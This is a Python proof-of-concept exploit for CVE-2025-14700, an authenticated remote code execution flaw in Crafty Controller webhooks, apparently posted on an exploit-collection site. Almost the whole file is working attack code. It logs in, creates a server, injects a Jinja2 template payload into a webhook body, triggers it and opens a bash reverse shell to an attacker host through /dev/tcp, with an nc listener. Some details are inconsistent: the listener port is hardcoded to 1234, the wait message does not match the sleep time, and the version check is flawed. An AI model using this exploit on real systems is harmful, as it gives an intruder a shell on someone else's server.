4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-14700.py PY
#!/usr/bin/env python3

# Turn off warnings 
import warnings
from urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore', InsecureRequestWarning)

import re
import os
import sys
import time
import socket
import requests
import argparse
import threading

# modify this according to your host, maybe a different payload will work (checkout revshells.com)
REVSHELL_TEMPLATE = "bash -c 'bash -i >/dev/tcp/%s/%d 0<&1 2>&1'"

# check if Crafty Controller is up and running properly
def sanity_check(url: str) -> bool:
    """Report whether the Crafty Controller API at *url* passes its health check.

    Sends a GET to ``<url>/api/v2/crafty/check`` with TLS verification
    disabled.

    Returns:
        True only when the endpoint answers HTTP 200 with a JSON object whose
        ``status`` field equals ``"ok"``. Connection errors, timeouts, other
        status codes and malformed bodies all yield False.
    """
    try:
        # A timeout keeps an unresponsive host from blocking the script forever.
        res = requests.get(url + "/api/v2/crafty/check", verify=False, timeout=10)
    except requests.RequestException:
        return False

    if res.status_code != 200:
        return False

    try:
        body = res.json()
    except ValueError:
        # Body was not valid JSON.
        return False

    return isinstance(body, dict) and body.get("status") == "ok"

def api_login(session: requests.Session, url: str, login: str, password: str) -> tuple[int, str]:
    """Log in through the Crafty Controller API and return ``(user_id, token)``.

    POSTs ``{"username": login, "password": password}`` as JSON to
    ``<url>/api/v2/auth/login/`` through *session*, with TLS verification
    disabled.

    Returns:
        The ``user_id`` (converted to int) and ``token`` taken from the
        response's ``data`` object.

    Raises:
        SystemExit: with status -1, after printing a ``[FATAL]`` message, when
            the endpoint does not answer HTTP 200, when the body's ``status``
            is not ``"ok"``, or when the body carries no usable ``data``.
    """
    endpoint = url + "/api/v2/auth/login/"
    credentials = {"username": login, "password": password}
    res = session.post(endpoint, json=credentials, verify=False)  # don't check SSL cert

    if res.status_code != 200:
        print(f"[FATAL] Got status code {res.status_code} on {endpoint}")
        sys.exit(-1)

    res_data = res.json()
    if res_data.get("status") != "ok":
        err, msg = res_data.get("error"), res_data.get("error_data")
        print(f"[FATAL] Failed to login : {err} - {msg}")
        sys.exit(-1)

    account = res_data.get("data")
    if not isinstance(account, dict) or account.get("user_id") is None:
        # Without this guard a missing field surfaced as a raw traceback.
        print("[FATAL] Failed to login : response did not include user data")
        sys.exit(-1)

    return (int(account["user_id"]), account.get("token"))

def get_version(session: requests.Session, url: str) -> tuple[int, int, int]:
    """Read the controller version from the ``/metrics`` endpoint.

    Fetches ``<url>/metrics`` through *session* (TLS verification disabled)
    and looks for a ``Crafty_Controller_info{docker="...",version="X.Y.Z"}``
    line in the response text.

    Returns:
        ``(major, middle, minor)`` as ints, or ``(-1, -1, -1)`` when the
        endpoint does not answer HTTP 200 or no version line is found.
    """
    res = session.get(url + "/metrics", verify=False)
    if res.status_code != 200:
        return (-1, -1, -1)  # couldn't find version

    # Whitespace around the dots is optional, so a plain "4.6.1" matches as
    # well as a spaced rendering. NOTE(review): the exact /metrics format is
    # not visible here; confirm against a live instance.
    found = re.search(
        r'Crafty_Controller_info\{docker="(?:True|False)",'
        r'version="(\d+)\s*\.\s*(\d+)\s*\.\s*(\d+)"\}',
        res.text,
    )
    if found is None:
        return (-1, -1, -1)

    major, middle, minor = (int(part) for part in found.groups())
    return (major, middle, minor)

def get_servers(session: requests.Session, url: str, uid: int) -> list[str]:
    """List the ids of the servers whose ``created_by`` field equals *uid*.

    Queries ``<url>/api/v2/servers`` through *session* (TLS verification
    disabled). On a non-200 answer, or a body whose ``status`` is not
    ``"ok"``, a ``[-]`` message is printed and an empty list is returned.
    """
    response = session.get(url + "/api/v2/servers", verify=False)

    if response.status_code != 200:
        print("[-] Failed to fetch servers, returning empty list.")
        return []

    body = response.json()
    if body.get("status") != "ok":
        err = body.get("error")
        msg = body.get("error_data")
        print(f"[-] Failed to fetch servers: {err} - {msg}, returning empty list.")
        return []

    # Keep only the entries created by the given user id.
    return [
        entry.get("server_id")
        for entry in body.get("data")
        if entry.get("created_by") == uid
    ]

def create_server(session: requests.Session, url: str) -> str:
    """Create a Java server through the API and return its new id.

    POSTs a fixed server definition (Paper 1.18.2 downloaded as a jar,
    monitored on 127.0.0.1:25565) to ``<url>/api/v2/servers`` through
    *session*, with TLS verification disabled.

    Returns:
        The ``new_server_id`` value from the response's ``data`` object.

    Exits the process with status -1, after printing a ``[FATAL]`` message,
    when the status code is neither 200 nor 201 or the body's ``status`` is
    not ``"ok"``.
    """
    jar_options = {
        "category": "mc_java_servers",
        "type": "paper",
        "version": "1.18.2",
        "mem_min": 1,
        "mem_max": 2,
        "server_properties_port": 25565,
    }
    request_body = {
        "name": "Example Java server.",
        "monitoring_type": "minecraft_java",
        "minecraft_java_monitoring_data": {"host": "127.0.0.1", "port": 25565},
        "create_type": "minecraft_java",
        "minecraft_java_create_data": {
            "create_type": "download_jar",
            "download_jar_create_data": jar_options,
        },
    }
    response = session.post(url + "/api/v2/servers", json=request_body, verify=False)

    # Either code counts as success; which one comes back depends on API version.
    if response.status_code != 200 and response.status_code != 201:
        print("[FATAL] Failed to create server. Cannot continue.")
        print(response.status_code)
        exit(-1)

    body = response.json()
    if body.get("status") != "ok":
        err, msg = body.get("error"), body.get("error_data")
        print(f"[FATAL] Failed to create server: {err} - {msg}")
        exit(-1)

    return body.get("data").get("new_server_id")

def create_hook(session: requests.Session, url: str, server_id: str, lhost: str, lport: int):
    endpoint = url + f"/api/v2/servers/{server_id}/webhook"
    revshell_cmd = REVSHELL_TEMPLATE % (lhost, lport)
    print("[*] revshell payload : " + revshell_cmd)
    payload = f"{{{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system(\"{revshell_cmd}\") }}}}"
    data = {
        "webhook_type": "Discord",
        "name": "My example Webhook",
        "url": "https://localhost:8443/", # doesn't matter if we want to setup a rev shell
        "bot_name": "Crafty Bot",
        "trigger": [
            "start_server"
        ],
        "body": payload,
        "color": "#c646000",
        "enabled": True
    }
    res = session.post(endpoint, json=data, verify=False)
    if res.status_code not in (200, 201):
        print(res.status_code)
        print(res.text)
        print("[FATAL] Failed to create vulnerable webhook.")
        exit(-1)

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[fatal] failed to create vulnerable webhook: {err} - {msg}")
        exit(-1)

# must be run in different thread for proper payload trigger timing
def trigger_exploit(session: requests.Session, url: str, server_id: str):
    print("[*] Waiting 7 seconds before triggering payload")
    time.sleep(2)
    endpoint = url + f"/api/v2/servers/{server_id}/action/kill_server"
    endpoint2= url + f"/api/v2/servers/{server_id}/action/start_server"
    endpoint3 = url + f"/api/v2/servers/{server_id}/action/eula"

    # kill server
    res = session.post(endpoint, verify=False)
    if res.status_code != 200:
        print("[*] failed to kill server.")

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[-] failed to kill server: {err} - {msg}")

    # start server
    res = session.post(endpoint2, verify=False)
    if res.status_code != 200:
        print("[FATAL] failed to trigger payload.")
        exit(-1)

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[FATAL] failed to trigger payload: {err} - {msg}")
        exit(-1)

    time.sleep(5) # wait for EULA prompt

    # validate EULA
    res = session.post(endpoint3, verify=False)
    if res.status_code != 200:
        print("[FATAL] failed to trigger payload.")
        exit(-1)

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[FATAL] failed to trigger payload: {err} - {msg}")
        exit(-1)

    print("[+] TRIGGERED PAYLOAD WAIT FOR SHELL")

def exploit(url: str, login: str, password: str, lhost: str, lport: int):
    session = requests.Session()

    if not sanity_check(url):
        print("[FATAL] Couldn't reach Crafty-Controller host or server is down.")
        return

    print(f"[+] Crafty Controller is running on {url}")

    uid, jwt = api_login(session, url, login, password)
    print(f"[+] Logged in as {login} : (uid = {uid}, jwt = {jwt})")

    major, middle, minor = get_version(session, url)
    print(f"[+] Target is running version {major}.{middle}.{minor}")
    if major <= 4 and middle <= 6 and minor <= 1:
        print("[+] VERSION IS VULNERABLE")
    elif (major, middle, minor) == (-1, -1, -1):
        print("[*] Couldn't fetch version. Maybe this instance isn't vulnerable.")
        res = input("Do you want to continue anyways (y/n) : ")
        if res.upper() == "N":
            print("Terminating.")
            exit(-1)
    else:
        print("[FATAL] VERSION IS NOT VULNERABLE")
        exit(-1)

    print(f"[*] checking if there is a server owned by {login}")
    owned_servers = get_servers(session, url, uid)
    print(f"[+] found {len(owned_servers)} server(s) owned by {login}.")

    if len(owned_servers) >= 1:
        res = input("Do you want to create a new server to exploit (saying no will use an existing one) ? (y/n)")
        if res == "n":
            server_id = owned_servers[0]
        else:
            server_id = create_server(session, url)
    else:
        server_id = create_server(session, url)

    # now we have our exploit server
    print(f"[+] Using server {server_id} for exploit.")

    create_hook(session, url, server_id, lhost, lport)

    print(f"[+] Created vulnerable hook ! starting server will trigger reverse shell on {lhost}:{lport}")

    trigger_thread = threading.Thread(target=trigger_exploit, args=(session, url, server_id,))
    trigger_thread.start()

    os.system("nc -nvlp 1234")



if __name__ == "__main__":
    # Command-line entry point: all five options are mandatory and are handed
    # to exploit() in the order url, login, password, lhost, lport.
    cli = argparse.ArgumentParser(
        prog='CVE-2025-14700',
        description='POC script for Authenticated RCE in Crafty-Controller Webhooks',
        epilog="by Nosiume @ 2025-12-17",
    )

    # (long flag, short flag, help text, extra add_argument keywords)
    option_table = (
        ('--url', '-u', 'The remote path in url format of the Crafty Controller instance', {}),
        ('--login', '-l', 'Username of the authenticated user', {}),
        ('--password', '-p', 'Password of the authenticated user', {}),
        ('--lhost', '-lh', 'IP to listen on', {}),
        ('--lport', '-lp', 'PORT to listen on', {'type': int}),
    )
    for long_flag, short_flag, help_text, extra in option_table:
        cli.add_argument(long_flag, short_flag, help=help_text, required=True, **extra)

    opts = cli.parse_args(sys.argv[1:])

    exploit(opts.url, opts.login, opts.password, opts.lhost, opts.lport)